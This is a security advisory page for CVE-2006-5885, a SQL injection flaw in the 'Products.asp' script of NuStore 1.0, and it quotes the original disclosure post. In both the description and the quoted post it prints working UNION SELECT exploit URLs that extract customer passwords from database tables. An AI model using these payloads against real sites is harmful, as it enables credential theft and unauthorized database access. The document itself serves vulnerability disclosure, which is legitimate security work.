NuStore Input Validation Flaw in 'Products.asp' Lets Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1017216 |
|
SecurityTracker URL: http://securitytracker.com/id/1017216
|
|
CVE Reference:
CVE-2006-5885
(Links to External Site)
|
Updated: May 30 2008
|
Original Entry Date: Nov 13 2006
|
Impact:
Disclosure of system information, Disclosure of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 1.0
|
Description:
A vulnerability was reported in NuStore. A remote user can inject SQL commands.
The 'Products.asp' script does not properly validate user-supplied input in the 'SubCatagoryID parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
ajann reported this vulnerability.
|
Impact:
A remote user can execute SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Cause:
Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 11 Nov 2006 13:24:58 +0000
Subject: NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
|
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
From:Filistin,Lubnan,IraQ,Turkey
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
|
|